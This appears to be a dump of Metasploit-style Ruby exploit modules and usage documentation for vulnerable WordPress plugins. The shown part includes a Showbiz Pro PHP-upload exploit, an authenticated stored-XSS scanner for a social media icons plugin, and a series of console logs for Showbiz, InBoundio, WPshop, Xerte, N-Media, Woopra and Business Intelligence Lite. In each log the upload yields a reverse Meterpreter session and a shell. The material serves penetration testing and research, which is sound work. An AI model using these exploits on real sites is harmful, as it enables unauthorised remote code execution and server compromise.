Rex::MIME::Message.new 57 | data.add_part('showbiz_ajax_action', nil, nil, 'form-data; name="action"') 58 | data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') 59 | data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"showbiz.zip\"") 60 | post_data = data.to_s 61 | 62 | res = send_request_cgi( 63 | 'uri' => wordpress_url_admin_ajax, 64 | 'method' => 'POST', 65 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 66 | 'data' => post_data 67 | ) 68 | 69 | if res 70 | if res.code == 200 && res.body.include?('Update in progress') 71 | register_files_for_cleanup(php_pagename) 72 | register_files_for_cleanup('../showbiz.zip') 73 | print_good("#{peer} - Our payload is: #{php_pagename}") 74 | print_status("#{peer} - Calling payload...") 75 | send_request_cgi( 76 | 'uri' => normalize_uri(wordpress_url_plugins, 'showbiz', 'temp', 'update_extract', 'showbiz', php_pagename), 77 | 'timeout' => 5 78 | ) 79 | elsif res.code == 200 && res.body =~ /^0$/ 80 | fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") 81 | else 82 | fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") 83 | end 84 | else 85 | fail_with(Failure::Unknown, 'No response or response body, bailing.') 86 | end 87 | end 88 | end 89 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_social_media_and_share_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Social Media and Share Icons XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit an Authenticated Cross-Site Scripting in Social 19 | Media and Share Icons Plugin for WordPress, version 1.1.1.11 and likely prior in order if the 20 | instance is vulnerable. 21 | }, 22 | 'Author' => [ 23 | 'g0blin', # Vulnerability Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => [ 28 | ['WPVDB', '8231'], 29 | ['URL', 'https://research.g0blin.co.uk/g0blin-00052/'] 30 | ], 31 | 'DisclosureDate' => 'Nov 22 2015' 32 | )) 33 | 34 | register_options( 35 | [ 36 | OptString.new('WP_USER', [true, 'A valid username', nil]), 37 | OptString.new('WP_PASS', [true, 'A valid password', nil]) 38 | ], self.class 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('ultimate-social-media-icons', '1.1.1.12') 44 | end 45 | 46 | def user 47 | datastore['WP_USER'] 48 | end 49 | 50 | def password 51 | datastore['WP_PASS'] 52 | end 53 | 54 | def send_xss(cookie, xss) 55 | res = send_request_cgi( 56 | 'method' => 'POST', 57 | 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), 58 | 'vars_post' => { 59 | 'action' => 'updateSrcn7', 60 | 'sfsi_popup_text' => "'\">", 61 | 'sfsi_Show_popupOn' => 'everypage', 62 | 'sfsi_Shown_popupOnceTime' => '' 63 | }, 64 | 'cookie' => cookie 65 | ) 66 | 67 | if res && res.code == 200 && res.body.include?('success') 68 | vprint_status("#{peer} - Sending payload with success.") 69 | return true 70 | else 71 | print_error("#{peer} - Not trigged XSS.") 72 | return nil 73 | end 74 | end 75 | 76 | def run_host(ip) 77 | xss = Rex::Text.rand_text_numeric(8) 78 | vprint_status("#{peer} - Trying to login as: #{user}") 79 | cookie = wordpress_login(user, password) 80 | fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{user}") if cookie.nil? 81 | 82 | fail_with(Failure::Unknown, "#{peer} - Unable to send xss") if send_xss(cookie, xss).nil? 83 | 84 | res = send_request_cgi( 85 | 'method' => 'GET', 86 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 87 | 'vars_get' => { 88 | 'page' => 'sfsi-options' 89 | }, 90 | 'cookie' => cookie 91 | ) 92 | 93 | if res && res.code == 200 && res.body.include?("#{xss}") 94 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the Ultimate Social Media 1.1.1.11 plugin for WordPress") 95 | p = store_local( 96 | 'wp_ultimate_social_media.http', 97 | 'text/html', 98 | res.body, 99 | "#{xss}" 100 | ) 101 | print_good("Save in: #{p}") 102 | else 103 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 104 | end 105 | end 106 | end 107 | -------------------------------------------------------------------------------- /documentation/exploits/wp_showbizpro_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin ThemePunch Showbiz Pro Upload Vulnerability. 2 | 3 | Application: WordPress Plugin 'Showbiz Pro 1.7.1 4 | Homepage: http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988 5 | References: https://wpvulndb.com/vulnerabilities/7955 6 | 7 | #### Vulnerable packages* 8 | 9 | 1.7.1 10 | 11 | #### Usage: 12 | 13 | ##### Linux (Ubuntu 12.04.5 LTS): 14 | ``` 15 | msf > use exploit/unix/webapp/wp_showbiz_file_upload 16 | msf exploit(wp_showbiz_file_upload) > show options 17 | 18 | Module options (exploit/unix/webapp/wp_showbiz_file_upload): 19 | 20 | Name Current Setting Required Description 21 | ---- --------------- -------- ----------- 22 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 23 | RHOST yes The target address 24 | RPORT 80 yes The target port 25 | TARGETURI / yes The base path to the wordpress application 26 | VHOST no HTTP server virtual host 27 | 28 | 29 | Exploit target: 30 | 31 | Id Name 32 | -- ---- 33 | 0 ThemePunch Showbiz Pro (showbiz) 1.7.1 34 | 35 | 36 | msf exploit(wp_showbiz_file_upload) > info 37 | 38 | Name: WordPress ShowBiz Pro Upload Vulnerability 39 | Module: exploit/unix/webapp/wp_showbiz_file_upload 40 | Platform: PHP 41 | Privileged: No 42 | License: Metasploit Framework License (BSD) 43 | Rank: Excellent 44 | Disclosed: 2015-11-26 45 | 46 | Provided by: 47 | Simo Ben youssef 48 | Roberto Soares Espreto 49 | 50 | Available targets: 51 | Id Name 52 | -- ---- 53 | 0 ThemePunch Showbiz Pro (showbiz) 1.7.1 54 | 55 | Basic options: 56 | Name Current Setting Required Description 57 | ---- --------------- -------- ----------- 58 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 59 | RHOST yes The target address 60 | RPORT 80 yes The target port 61 | TARGETURI / yes The base path to the wordpress application 62 | VHOST no HTTP server virtual host 63 | 64 | Payload information: 65 | 66 | Description: 67 | This module exploits an arbitrary PHP code upload in the WordPress 68 | ThemePunch ShowBiz Pro plugin, version 1.7.1 and prior. The 69 | vulnerability allows for arbitrary file upload and remote code 70 | execution. 71 | 72 | References: 73 | https://www.exploit-db.com/exploits/35385 74 | https://wpvulndb.com/vulnerabilities/7955 75 | http://www.osvdb.org/115118 76 | https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability 77 | 78 | msf exploit(wp_showbiz_file_upload) > set RHOST 192.168.1.31 79 | RHOST => 192.168.1.31 80 | msf exploit(wp_showbiz_file_upload) > exploit 81 | 82 | [*] Started reverse handler on 192.168.1.37:4444 83 | [+] 192.168.1.31:80 - Our payload is: rKgM.php 84 | [*] 192.168.1.31:80 - Calling payload... 85 | [*] Sending stage (40499 bytes) to 192.168.1.31 86 | [*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:52046) at 2015-05-06 03:41:20 -0300 87 | [+] Deleted rKgM.php 88 | [+] Deleted ../showbiz.zip 89 | 90 | meterpreter > sysinfo 91 | Computer : msfdevel 92 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 93 | Meterpreter : php/php 94 | meterpreter > shell 95 | Process 22492 created. 96 | Channel 0 created. 97 | 98 | id 99 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 100 | 101 | ``` 102 | -------------------------------------------------------------------------------- /documentation/exploits/wp_inboundio_marketing_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin InBoundio Marketing File Upload Vulnerability. 2 | 3 | Application: WordPress Plugin 'InBoundio Marketing' 2.0 4 | Homepage: https://wordpress.org/plugins/inboundio-marketing/ 5 | Source Code: https://downloads.wordpress.org/plugin/inboundio-marketing.2.0.zip 6 | References: https://wpvulndb.com/vulnerabilities/7864 7 | 8 | #### Vulnerable packages* 9 | 10 | 2.0 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use exploit/unix/webapp/wp_inboundio_marketing_file_upload 17 | msf exploit(wp_inboundio_marketing_file_upload) > show options 18 | 19 | Module options (exploit/unix/webapp/wp_inboundio_marketing_file_upload): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOST yes The target address 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | VHOST no HTTP server virtual host 28 | 29 | 30 | Exploit target: 31 | 32 | Id Name 33 | -- ---- 34 | 0 InBoundio Marketing 2.0 35 | 36 | 37 | msf exploit(wp_inboundio_marketing_file_upload) > info 38 | 39 | Name: WordPress InBoundio Marketing Upload Vulnerability 40 | Module: exploit/unix/webapp/wp_inboundio_marketing_file_upload 41 | Platform: PHP 42 | Privileged: No 43 | License: Metasploit Framework License (BSD) 44 | Rank: Excellent 45 | Disclosed: 2015-03-24 46 | 47 | Provided by: 48 | KedAns-Dz 49 | Roberto Soares Espreto 50 | 51 | Available targets: 52 | Id Name 53 | -- ---- 54 | 0 InBoundio Marketing 2.0 55 | 56 | Basic options: 57 | Name Current Setting Required Description 58 | ---- --------------- -------- ----------- 59 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 60 | RHOST yes The target address 61 | RPORT 80 yes The target port 62 | TARGETURI / yes The base path to the wordpress application 63 | VHOST no HTTP server virtual host 64 | 65 | Payload information: 66 | 67 | Description: 68 | This module exploits an arbitrary PHP code upload in the WordPress 69 | InBoundio Marketing version 2.0. The vulnerability allows for 70 | arbitrary file upload and remote code execution. 71 | 72 | References: 73 | http://www.exploit-db.com/exploits/36478 74 | http://www.osvdb.org/119890 75 | https://wpvulndb.com/vulnerabilities/7864 76 | 77 | msf exploit(wp_inboundio_marketing_file_upload) > set RHOST 192.168.1.31 78 | RHOST => 192.168.1.31 79 | msf exploit(wp_inboundio_marketing_file_upload) > exploit 80 | 81 | [*] Started reverse handler on 192.168.1.37:4444 82 | [+] 192.168.1.31:80 - Our payload is at: yNwDcuwRwxdCM.php. Calling payload... 83 | [*] 192.168.1.31:80 - Calling payload... 84 | [*] Sending stage (40499 bytes) to 192.168.1.31 85 | [*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:50526) at 2015-04-23 03:22:04 -0300 86 | [+] Deleted yNwDcuwRwxdCM.php 87 | 88 | 89 | meterpreter > 90 | meterpreter > sysinfo 91 | Computer : msfdevel 92 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 93 | Meterpreter : php/php 94 | meterpreter > shell 95 | Process 28010 created. 96 | Channel 0 created. 97 | 98 | id 99 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 100 | 101 | ``` 102 | -------------------------------------------------------------------------------- /documentation/exploits/wp_wpshop_ecommerce_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress WPshop eCommerce File Upload Vulnerability. 2 | 3 | Application: WordPress Plugin 'WPshop eCommerce' 1.3.9.5 4 | Homepage: https://wordpress.org/plugins/wpshop/ 5 | Source Code: https://downloads.wordpress.org/plugin/wpshop.1.3.9.5.zip 6 | Active Installs: 1,000+ 7 | References: https://wpvulndb.com/vulnerabilities/7830 8 | 9 | #### Vulnerable packages* 10 | 11 | 1.3.9.5 12 | 13 | #### Usage: 14 | 15 | ##### Linux (Ubuntu 12.04.5 LTS): 16 | ``` 17 | msf > use exploit/unix/webapp/wp_wpshop_ecommerce_file_upload 18 | msf exploit(wp_wpshop_ecommerce_file_upload) > show options 19 | 20 | Module options (exploit/unix/webapp/wp_wpshop_ecommerce_file_upload): 21 | 22 | Name Current Setting Required Description 23 | ---- --------------- -------- ----------- 24 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 25 | RHOST yes The target address 26 | RPORT 80 yes The target port 27 | TARGETURI / yes The base path to the wordpress application 28 | VHOST no HTTP server virtual host 29 | 30 | 31 | Exploit target: 32 | 33 | Id Name 34 | -- ---- 35 | 0 WPshop eCommerce 1.3.9.5 36 | 37 | 38 | msf exploit(wp_wpshop_ecommerce_file_upload) > info 39 | 40 | Name: WordPress WPshop eCommerce Upload Vulnerability 41 | Module: exploit/unix/webapp/wp_wpshop_ecommerce_file_upload 42 | Platform: PHP 43 | Privileged: No 44 | License: Metasploit Framework License (BSD) 45 | Rank: Excellent 46 | Disclosed: 2015-03-09 47 | 48 | Provided by: 49 | g0blin 50 | Roberto Soares Espreto 51 | 52 | Available targets: 53 | Id Name 54 | -- ---- 55 | 0 WPshop eCommerce 1.3.9.5 56 | 57 | Basic options: 58 | Name Current Setting Required Description 59 | ---- --------------- -------- ----------- 60 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 61 | RHOST yes The target address 62 | RPORT 80 yes The target port 63 | TARGETURI / yes The base path to the wordpress application 64 | VHOST no HTTP server virtual host 65 | 66 | Payload information: 67 | 68 | Description: 69 | This module exploits an arbitrary PHP code upload in the WordPress 70 | WPshop eCommerce plugin, version 1.3.9.5. The vulnerability allows 71 | for arbitrary file upload and remote code execution. 72 | 73 | References: 74 | https://wpvulndb.com/vulnerabilities/7830 75 | https://research.g0blin.co.uk/g0blin-00036/ 76 | 77 | msf exploit(wp_wpshop_ecommerce_file_upload) > set RHOST 192.168.1.31 78 | RHOST => 192.168.1.31 79 | msf exploit(wp_wpshop_ecommerce_file_upload) > check 80 | [*] 192.168.1.31:80 - The target appears to be vulnerable. 81 | msf exploit(wp_wpshop_ecommerce_file_upload) > exploit 82 | 83 | [*] Started reverse handler on 192.168.1.37:4444 84 | [+] 192.168.1.31:80 - Our payload is at: jKjs.php. Calling payload... 85 | [*] 192.168.1.31:80 - Calling payload... 86 | [*] Sending stage (40499 bytes) to 192.168.1.31 87 | [*] Meterpreter session 2 opened (192.168.1.37:4444 -> 192.168.1.31:51030) at 2015-04-24 06:16:12 -0300 88 | [+] Deleted jKjs.php 89 | 90 | meterpreter > sysinfo 91 | Computer : msfdevel 92 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 93 | Meterpreter : php/php 94 | meterpreter > shell 95 | Process 2240 created. 96 | Channel 0 created. 97 | 98 | id 99 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 100 | ``` 101 | -------------------------------------------------------------------------------- /documentation/exploits/wp_xerteonline_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin Xerte Online Upload Vulnerability. 2 | 3 | Application: WordPress Plugin 'Xerte Online' 0.32 4 | Homepage: https://wordpress.org/plugins/xerte-online/ 5 | Source Code: http://downloads.wordpress.org/plugin/xerte-online.0.32.zip 6 | References: https://wpvulndb.com/vulnerabilities/6102 7 | 8 | #### Vulnerable packages* 9 | 10 | 0.32 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 14.04.2 LTS): 15 | ``` 16 | msf > use exploit/unix/webapp/wp_xerteonline_file_upload 17 | msf exploit(wp_xerteonline_file_upload) > info 18 | 19 | Name: WordPress Xerte Online Upload Vulnerability 20 | Module: exploit/unix/webapp/wp_xerteonline_file_upload 21 | Platform: PHP 22 | Privileged: No 23 | License: Metasploit Framework License (BSD) 24 | Rank: Excellent 25 | Disclosed: 2012-12-30 26 | 27 | Provided by: 28 | Sammy 29 | Roberto Soares Espreto 30 | 31 | Available targets: 32 | Id Name 33 | -- ---- 34 | 0 Xerte Online 0.32 35 | 36 | Basic options: 37 | Name Current Setting Required Description 38 | ---- --------------- -------- ----------- 39 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 40 | RHOST yes The target address 41 | RPORT 80 yes The target port 42 | TARGETURI / yes The base path to the wordpress application 43 | VHOST no HTTP server virtual host 44 | 45 | Payload information: 46 | 47 | Description: 48 | This module exploits an arbitrary PHP code upload in the WordPress 49 | Xerte Online plugin, version 0.32. The vulnerability allows for 50 | arbitrary file upload and remote code execution. 51 | 52 | References: 53 | https://wpvulndb.com/vulnerabilities/6102 54 | http://www.opensyscom.fr/Actualites/wordpress-plugins-xerte-online-arbitrary-file-upload-vulnerability.html 55 | http://packetstormsecurity.com/files/119220/ 56 | 57 | msf exploit(wp_xerteonline_file_upload) > show options 58 | 59 | Module options (exploit/unix/webapp/wp_xerteonline_file_upload): 60 | 61 | Name Current Setting Required Description 62 | ---- --------------- -------- ----------- 63 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 64 | RHOST yes The target address 65 | RPORT 80 yes The target port 66 | TARGETURI / yes The base path to the wordpress application 67 | VHOST no HTTP server virtual host 68 | 69 | 70 | Exploit target: 71 | 72 | Id Name 73 | -- ---- 74 | 0 Xerte Online 0.32 75 | 76 | 77 | msf exploit(wp_xerteonline_file_upload) > set RHOST 192.168.1.38 78 | RHOST => 192.168.1.38 79 | msf exploit(wp_xerteonline_file_upload) > check 80 | [*] 192.168.1.38:80 - The target appears to be vulnerable. 81 | msf exploit(wp_xerteonline_file_upload) > exploit 82 | 83 | [*] Started reverse handler on 192.168.1.37:4444 84 | [+] 192.168.1.38:80 - Our payload is at: AeIaW.php. Calling payload... 85 | [*] 192.168.1.38:80 - Calling payload... 86 | [*] Sending stage (40499 bytes) to 192.168.1.38 87 | [*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.38:53927) at 2015-05-13 02:17:28 -0300 88 | [+] Deleted AeIaW.php 89 | 90 | meterpreter > sysinfo 91 | Computer : devel 92 | OS : Linux devel 3.16.0-37-generic #51~14.04.1-Ubuntu SMP Wed May 6 15:23:14 UTC 2015 x86_64 93 | Meterpreter : php/php 94 | meterpreter > shell 95 | Process 22147 created. 96 | Channel 0 created. 97 | 98 | id 99 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 100 | 101 | ``` 102 | -------------------------------------------------------------------------------- /documentation/exploits/wp_nmediawebsite_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress N-Media Website Contact Form 1.3.4 Shell Upload. 2 | 3 | Application: WordPress N-Media Website Contact Form 4 | Homepage: https://wordpress.org/plugins/website-contact-form-with-file-upload 5 | Source Code: https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip 6 | Active Installs (wordpress.org): 1,000+ 7 | References: https://wpvulndb.com/vulnerabilities/7896 8 | 9 | #### Vulnerable packages* 10 | 11 | 1.3.4 12 | 13 | #### Usage: 14 | 15 | ##### Linux (Ubuntu 12.04.5 LTS): 16 | ``` 17 | msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload 18 | msf exploit(wp_nmediawebsite_file_upload) > show options 19 | 20 | Module options (exploit/unix/webapp/wp_nmediawebsite_file_upload): 21 | 22 | Name Current Setting Required Description 23 | ---- --------------- -------- ----------- 24 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 25 | RHOST yes The target address 26 | RPORT 80 yes The target port 27 | TARGETURI / yes The base path to the wordpress application 28 | VHOST no HTTP server virtual host 29 | 30 | 31 | Exploit target: 32 | 33 | Id Name 34 | -- ---- 35 | 0 N-Media WebSite Contact Form 1.3.4 36 | 37 | 38 | msf exploit(wp_nmediawebsite_file_upload) > info 39 | 40 | Name: WordPress N-Media Website Contact Form Upload Vulnerability 41 | Module: exploit/unix/webapp/wp_nmediawebsite_file_upload 42 | Platform: PHP 43 | Privileged: No 44 | License: Metasploit Framework License (BSD) 45 | Rank: Excellent 46 | Disclosed: 2015-04-12 47 | 48 | Provided by: 49 | Claudio Viviani 50 | Roberto Soares Espreto 51 | 52 | Available targets: 53 | Id Name 54 | -- ---- 55 | 0 N-Media WebSite Contact Form 1.3.4 56 | 57 | Basic options: 58 | Name Current Setting Required Description 59 | ---- --------------- -------- ----------- 60 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 61 | RHOST yes The target address 62 | RPORT 80 yes The target port 63 | TARGETURI / yes The base path to the wordpress application 64 | VHOST no HTTP server virtual host 65 | 66 | Payload information: 67 | 68 | Description: 69 | This module exploits an arbitrary PHP code upload in the WordPress 70 | N-Media Website Contact Form plugin, version 1.3.4. The 71 | vulnerability allows for arbitrary file upload and remote code 72 | execution. 73 | 74 | References: 75 | http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/ 76 | https://wpvulndb.com/vulnerabilities/7896 77 | 78 | msf exploit(wp_nmediawebsite_file_upload) > set RHOST 192.168.1.31 79 | RHOST => 192.168.1.31 80 | msf exploit(wp_nmediawebsite_file_upload) > exploit 81 | 82 | [*] Started reverse handler on 192.168.1.46:4444 83 | [+] 192.168.1.31:80 - Our payload is at: 1428976681-oevRlIo.php. Calling payload... 84 | [*] 192.168.1.31:80 - Calling payload... 85 | [*] Sending stage (40499 bytes) to 192.168.1.31 86 | [*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40674) at 2015-04-13 22:57:39 -0300 87 | [+] Deleted 1428976681-oevRlIo.php 88 | 89 | meterpreter > sysinfo 90 | Computer : msfdevel 91 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 92 | Meterpreter : php/php 93 | meterpreter > shell 94 | Process 25091 created. 95 | Channel 0 created. 96 | 97 | id 98 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 99 | 100 | 101 | ``` 102 | -------------------------------------------------------------------------------- /documentation/exploits/wp_woopra_analytics_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Woopra Analytics File Upload Vulnerability. 2 | 3 | Application: WordPress Plugin 'Woopra Analytics' 1.4.3.1 4 | Homepage: https://wordpress.org/plugins/woopra 5 | Source Code: https://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip 6 | Active Installs: 8,000+ 7 | References: https://wpvulndb.com/vulnerabilities/6903 8 | 9 | #### Vulnerable packages* 10 | 11 | 1.4.3.1 12 | 13 | #### Usage: 14 | 15 | ##### Linux (Ubuntu 12.04.5 LTS): 16 | ``` 17 | msf > use exploit/unix/webapp/wp_woopra_analytics_file_upload 18 | msf exploit(wp_woopra_analytics_file_upload) > show options 19 | 20 | Module options (exploit/unix/webapp/wp_woopra_analytics_file_upload): 21 | 22 | Name Current Setting Required Description 23 | ---- --------------- -------- ----------- 24 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 25 | RHOST yes The target address 26 | RPORT 80 yes The target port 27 | TARGETURI / yes The base path to the wordpress application 28 | VHOST no HTTP server virtual host 29 | 30 | 31 | Exploit target: 32 | 33 | Id Name 34 | -- ---- 35 | 0 WP Woopra Analytics 1.4.3.1 36 | 37 | 38 | msf exploit(wp_woopra_analytics_file_upload) > info 39 | 40 | Name: WordPress Woopra Analytics File Upload 41 | Module: exploit/unix/webapp/wp_woopra_analytics_file_upload 42 | Platform: PHP 43 | Privileged: No 44 | License: Metasploit Framework License (BSD) 45 | Rank: Excellent 46 | Disclosed: 2015-04-06 47 | 48 | Provided by: 49 | wantexz 50 | Roberto Soares Espreto 51 | 52 | Available targets: 53 | Id Name 54 | -- ---- 55 | 0 WP Woopra Analytics 1.4.3.1 56 | 57 | Basic options: 58 | Name Current Setting Required Description 59 | ---- --------------- -------- ----------- 60 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 61 | RHOST yes The target address 62 | RPORT 80 yes The target port 63 | TARGETURI / yes The base path to the wordpress application 64 | VHOST no HTTP server virtual host 65 | 66 | Payload information: 67 | 68 | Description: 69 | The WordPress Woopra Analytics plugin contains an file upload 70 | vulnerability. We can upload arbitrary files to the upload folder, 71 | because the plugin also uses it's own file upload mechanism instead 72 | of the wordpress api it's possible to upload any file type. 73 | 74 | References: 75 | https://wpvulndb.com/vulnerabilities/6903 76 | http://packetstormsecurity.com/files/123525/ 77 | 78 | msf exploit(wp_woopra_analytics_file_upload) > set RHOST 192.168.1.31 79 | RHOST => 192.168.1.31 80 | msf exploit(wp_woopra_analytics_file_upload) > check 81 | [*] 192.168.1.31:80 - The target appears to be vulnerable. 82 | msf exploit(wp_woopra_analytics_file_upload) > exploit 83 | 84 | [*] Started reverse handler on 192.168.1.37:4444 85 | [*] 192.168.1.31:80 - Trying to upload payload 86 | [*] 192.168.1.31:80 - Uploading payload 87 | [*] 192.168.1.31:80 - Calling uploaded file hmbyyz.php 88 | [*] Sending stage (40499 bytes) to 192.168.1.31 89 | [*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:47928) at 2015-04-27 00:15:32 -0300 90 | [+] Deleted hmbyyz.php 91 | 92 | meterpreter > sysinfo 93 | Computer : msfdevel 94 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 95 | Meterpreter : php/php 96 | meterpreter > shell 97 | Process 3706 created. 98 | Channel 0 created. 99 | 100 | id 101 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 102 | 103 | ``` 104 | -------------------------------------------------------------------------------- /documentation/exploits/wp_business_intelligence_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin WP Business Intelligence Lite File Read Vulnerability. 2 | 3 | Application: WordPress Plugin 'WP Business Intelligence Lite' 1.0.6 4 | Homepage: https://wordpress.org/plugins/wp-business-intelligence-lite/ 5 | Source Code: https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.0.6.zip 6 | References: https://wpvulndb.com/vulnerabilities/7200 7 | 8 | #### Vulnerable packages* 9 | 10 | 1.0.6 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use exploit/unix/webapp/wp_business_intelligence_file_upload 17 | msf exploit(wp_business_intelligence_file_upload) > show options 18 | 19 | Module options (exploit/unix/webapp/wp_business_intelligence_file_upload): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOST yes The target address 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | VHOST no HTTP server virtual host 28 | 29 | 30 | Exploit target: 31 | 32 | Id Name 33 | -- ---- 34 | 0 WP Business Intelligence Lite 1.0.6 35 | 36 | 37 | msf exploit(wp_business_intelligence_file_upload) > info 38 | 39 | Name: WordPress Business Intelligence Lite File Upload 40 | Module: exploit/unix/webapp/wp_business_intelligence_file_upload 41 | Platform: PHP 42 | Privileged: No 43 | License: Metasploit Framework License (BSD) 44 | Rank: Excellent 45 | Disclosed: 2014-03-31 46 | 47 | Provided by: 48 | Manish Kishan Tanwar 49 | Roberto Soares Espreto 50 | 51 | Available targets: 52 | Id Name 53 | -- ---- 54 | 0 WP Business Intelligence lite 1.0.6 55 | 56 | Basic options: 57 | Name Current Setting Required Description 58 | ---- --------------- -------- ----------- 59 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 60 | RHOST yes The target address 61 | RPORT 80 yes The target port 62 | TARGETURI / yes The base path to the wordpress application 63 | VHOST no HTTP server virtual host 64 | 65 | Payload information: 66 | 67 | Description: 68 | The WordPress Business Intelligence Lite plugin contains an file 69 | upload vulnerability. We can upload arbitrary files to the upload 70 | folder, because the plugin also uses it's own file upload mechanism 71 | instead of the wordpress api it's possible to upload any file type. 72 | 73 | References: 74 | https://wpvulndb.com/vulnerabilities/7200 75 | http://packetstormsecurity.com/files/125927/ 76 | 77 | msf exploit(wp_business_intelligence_file_upload) > set RHOST 192.168.1.31 78 | RHOST => 192.168.1.31 79 | msf exploit(wp_business_intelligence_file_upload) > check 80 | [*] 192.168.1.31:80 - The target appears to be vulnerable. 81 | msf exploit(wp_business_intelligence_file_upload) > exploit 82 | 83 | [*] Started reverse handler on 192.168.1.37:4444 84 | [*] 192.168.1.31:80 - Trying to upload payload 85 | [*] 192.168.1.31:80 - Uploading payload 86 | [*] 192.168.1.31:80 - Calling uploaded file xrhzqm.php 87 | [*] Sending stage (40499 bytes) to 192.168.1.31 88 | [*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:51984) at 2015-04-26 01:21:09 -0300 89 | [+] Deleted xrhzqm.php 90 | 91 | meterpreter > sysinfo 92 | Computer : msfdevel 93 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 94 | Meterpreter : php/php 95 | meterpreter > shell 96 | Process 11005 created. 97 | Channel 0 created. 98 | 99 | id 100 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 101 | ``` 102 | -------------------------------------------------------------------------------- /documentation/exploits/wp_frontend_editor_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin Front-end Editor File Upload Vulnerability. 2 | 3 | Application: WordPress Plugin 'Front-end Editor' 2.2.1 4 | Homepage: https://wordpress.org/plugins/front-end-editor 5 | Source Code: http://downloads.wordpress.org/plugin/front-end-editor.2.2.1.zip 6 | Active Installs (wordpress.org): 10,000+ 7 | References: https://wpvulndb.com/vulnerabilities/7569 8 | 9 | #### Vulnerable 